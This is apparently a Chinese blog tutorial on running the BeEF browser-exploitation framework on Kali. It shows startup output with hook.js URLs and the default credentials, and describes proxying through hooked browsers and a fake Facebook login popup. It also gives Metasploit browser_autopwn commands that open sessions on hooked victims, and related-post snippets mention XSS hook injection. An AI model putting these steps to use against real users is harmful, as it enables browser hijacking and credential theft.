BeEF

最新推荐文章于 2024-04-29 23:09:20 发布
最新推荐文章于 2024-04-29 23:09:20 发布
阅读量1k 收藏
点赞数
分类专栏: kaliTools
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freegotocpp/article/details/82724795
版权

官方: https://beefproject.com/

GitHub: https://github.com/beefproject/beef

kali启动beef:

/usr/share/beef-xss# ./beef 
[15:07:21][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[15:07:21][*] Browser Exploitation Framework (BeEF) 0.4.7.0-alpha #版本号
[15:07:21]    |   Twit: @beefproject
[15:07:21]    |   Site: http://beefproject.com
[15:07:21]    |   Blog: http://blog.beefproject.com
[15:07:21]    |_  Wiki: https://github.com/beefproject/beef/wiki
[15:07:21][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[15:07:21][*] Successful connection with Metasploit.
[15:07:21][*] Loaded 298 Metasploit exploits.
[15:07:21][*] BeEF is loading. Wait a few seconds...
[15:07:24][*] 13 extensions enabled.
[15:07:24][*] 552 modules enabled. #一共加载多少模块
[15:07:24][*] 2 network interfaces were detected.
[15:07:24][+] running on network interface: 127.0.0.1
[15:07:24]    |   Hook URL: http://127.0.0.1:3000/hook.js
[15:07:24]    |_  UI URL:   http://127.0.0.1:3000/ui/panel #登录界面
[15:07:24][+] running on network interface: 192.168.1.105
[15:07:24]    |   Hook URL: http://192.168.1.105:3000/hook.js
[15:07:24]    |_  UI URL:   http://192.168.1.105:3000/ui/panel
[15:07:24][*] RESTful API key: 893473366f7e05666f0a11c01c9fb6049c07d305
[15:07:24][*] HTTP Proxy: http://127.0.0.1:6789
[15:07:24][*] BeEF server started (press control+c to stop)

默认账号密码都是beef;修改配置 /usr/share/beef-xss/config.yaml 结合Metasploit框架配置文件:/usr/share/beef-xss/extensions/metasploit/config.yaml

登录打开控制台:

如果beef布置在公网服务器上,要修改配置文件,不然都可以登录访问控制台!!!

左侧显示被勾住的浏览器:

双击目标可以显示详细信息 

 

双击显示浏览器详细信息

绿色:表示该命令模块对目标可使用,将被检查到

橙色:表示该命令模块对目标可使用,可能被检查到

灰色:表示该命令模块尚未得到目标验证

红色:表示该命令模块针对目标不一定可使用


 

选中勾住的浏览目标可设置为代理,并将通过该浏览器代理挂钩网站所在域内的网站。

设置为代理 在Rider模块查看信息:

社会工程模块使用:

弹框Facebook登录界面:

查看记录能看到历史的记录:

使用metasploit结合Beef使用:

load msgrpc ServerHost=IP Pass=pass
use auxiliary/server/browser_autopwn
set URIPATH /
set LHOST IP
run

启动./beef -x

访问控制台能看到metasploit模块的数量增多了。

 

 

单个使用不一定有效 在设置URIPATH的时候set的 / 这样又便于使用多的模块展开攻击,只要给浏览器发送 例如:http://192.168.1.1:8080/ 

选完要使用的模块后:

 msf终端查看sessions

 

zhaji001
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Beff安装与使用
m0_37786014的博客
03-07 4456
有很多版本的kali都是自带安装了Beff的,但是不知道我的kali为啥就没自动安装,所以这里我手动进行安装 1.安装beef 打开终端,输入如下命令: aptt-get install beef-xss 2. 打开beef 上诉安装好以后,建议重启kali机器 重启好以后就能正常打开beef软件了,打开以后会让你设置密码,这里自己设置密码 3. 打开beef 输入上面的地址即可打开beef,...
BeEF介绍
aletero的专栏
07-10 2612
什么是BeFF?         BeEF是目前欧美最流行的web框架攻击平台,它的全称是 the Browser exploitation framework project.最近两年国外各种黑客的会议都有它的介绍,很多pentester对这个工具都有很高的赞美。        通过XSS这个简单的漏洞,BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种
BEFF安装与配置
Kali与编程
12-19 1183
BeEF是一款功能强大的浏览器利用框架,对于渗透测试人员和安全研究人员来说,是一种有用的工具,可以帮助他们评估和加固浏览器的安全性。重要的是,在使用BeEF进行渗透测试时,要遵守法律和道德规范,并且只在合法授权的情况下使用该工具。选择适合自己的方式安装Kali Linux,配置好网络设置,并熟悉和掌握常用的渗透测试工具,这样就能够在Kali Linux环境中进行有效的渗透测试和安全审计工作。请记住,BeEF是一种强大的工具,应在合法的道德框架内使用,并遵循适用的法律和规定。
BeFF&&Metasploit&&Venom
自学编程_youkewang.top
03-14 869
这几天学习了BeFF,发现是个很牛逼的XSS平台,感觉Kali上面的工具都很牛逼;在网上看了很多文档,几乎都是BeFF结合MSF入侵XP的文章,觉得没什么创新,于是就有了这篇文章。测试环境:Kali,Win7,Venom思路:1.使用Venom生成免杀的bat文件用作后门.2.Kali开启apache并在网页中嵌入Hook地址。3.BeFF控制被劫持浏览器访问恶意地址;这里我使用Msf中的brow...
Beff的学习
dichiji8804的博客
04-28 2096
Beff介绍 BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 首先打开kali,直接点击beef图标打开beef 浏览器会默认弹出beef登录界面,默认登录名密码均为beef 登录系统 在本地浏览器输入Beff默认页面(kali的IP+端口号3000+默认地址):http://192.1...
beef安装
最新发布
2403_82795493的博客
04-29 417
长度被限制了,做一个简单的xss绕过,检测源码,把maxlength改为100就行。把短链接发送给靶机访问(靶机访问就会受到xss攻击)利用生成的链接插入到,存在xss漏洞的地方。打开皮卡丘靶场,将payload插入到里面。第一次会提示让你输入新密码,用于一会登录。攻击机IP:192.168.0.105。本机IP:192.168.0.5。在登录beef,查看信息。把生成的新链接复制下来。启动beef-xss。
BeFF使用方法
自学编程_youkewang.top
03-14 4516
原文地址:http://resources.infosecinstitute.com/beef-part-1/ http://resources.infosecinstitute.com/beef-part-2/ BeEF使用浏览器漏洞来获得目标机器的控制权。BeEF提供API,我们可以编写自己的模块来攻击目标浏览器。 1. 安装 1)使用root权限执行下列命令: Xml代码  # apt-ge...
Linux自动化简单安装beef xss framework的方法及BeEF的启动
01-28 3600
Linux中BeEF的安装
kali上安装beef
weixin_45873667的博客
04-27 488
前言: BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具 安装BeEF步骤 打开kali sudo apt-get install beef-xss 输入beef-xss启动beef,输入用户名和密码,(默认都是admin) 接着输入beef-xss启动 ...
beef-installer:用于发行版和Termux的BeEF安装程序!
04-17
牛肉安装机 该脚本可自动从GitHub安装BeEF(浏览器利用框架)。 要使用它以root身份运行: (为了): git clone https://github.com/tony23x/beef-install.git cd beef-installer;ls bash install.sh python3 beef-installer.py 准备好了! 如果是disro,则牛肉目录将位于环境变量$ HOME中,位于termux中的$ PREFIX / opt中 Kali Linux(PC,Userland) Kali Nethunter无根 Termux 预览: Termux
Beef的安装及基本使用
weixin_50341025的博客
04-15 2582
安装beef apt-get update apt-get install beef-xss 配置密码 /etc/beef-xss/config.yaml 默认用户名beef 修改用户名或者密码,注意用户名不需要符号括起来,密码则需要双引号括起来 启动服务 beef-xss 启动后会看见一些生成好的连接 [] Web UI: http://127.0.0.1:3000/ui/panel 管理页面 [] Hook: 样例地址 登录beef控制平台 将代码插入到目标URL,并欺骗被攻击
XSS框架之安装BEEF
3569
07-18 2674
这次部署邮件服务器大致分为3个步骤 » 安装GEM » 安装配置BEEF » 测试 » 安装GEM 步骤 1 » 安装rvm。 wget -O 123 https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer chmod +x 123 ./123 安装环境需
beef工具-01】神器beef的安装与简介
m0_64378913的博客
06-01 7469
目录1 beef概述1 beef简介1.2 beef2 beef安装3 beef的重要网址4 简单测试5 总结参考文章 1 beef概述 1 beef简介 BeEF 是浏览器开发框架的缩写。 它是一款专注于网络浏览器的渗透测试工具。 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。 与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器。
beef安装具体过程
qq_35398399的博客
10-27 1750
新版kali的BeEF的安装使用root权限安装beef-xss安装apt --fix-broken install![在这里插入图片描述](https://img-blog.csdnimg.cn/20201027105521422.png#pic_center)安装beef-xss运行beef-xss登录beef网站进行具体操作 使用root权限 安装了一个月,一直没有办法安装上kali,终于有一天不知道是哪位锦鲤保佑,突然我就安装上了。再次分享给大家我的经验。 1.利用sudo su进入root权限 安
BEEF的简介与使用
永远是少年
10-31 2233
今天继续给大家介绍渗透测试相关知识,本文主要内容是BEEF的简介与使用。 一、BEEF简介 二、BEEF渗透测试实战
世一之详细之安装kali安装beef
atm7758258的博客
04-26 1395
kali安装beef常见操作,帮助排坑
Kali Linux-BeEF浏览器渗透框架
道阻且长,行则将至。
12-26 4724
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助 Kali Linux 系统内置的 BeEF 渗透框架,通过一段编制好的JS代码控制目标主机 Win 7 虚拟机的浏览器,进而进行社会工程学攻击(发送钓鱼网页盗窃账户密码、恶意程序发送等)和其他攻击,同时演示借助 Win 7上搭建的DVWA靶场的存储型XSS漏洞自动触发JS攻击脚本(获取Cookie)。 环境说明 ...
BEEF的搭建与使用
热门推荐
王意林的专栏
07-17 1万+
安装与搭建 beef是ruby写的,在windows下安装beef还是有些麻烦的,需要装很多东西。 源码在github googlecode等地方均有下载 http://code.google.com/p/beef/downloads/list https://github.com/beefproject/beef 在windows下配置ruby,推荐大家使用railsinstal
Beef插件功能详解:网页数据提取与安全测试
"beef插件翻译" 在网络安全和渗透测试领域,BeEF(Browser Exploitation Framework,浏览器exploit框架)是一种强大的工具,主要用于利用浏览器中的安全漏洞。它通过JavaScript钩子来控制受感染的浏览器,从而进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值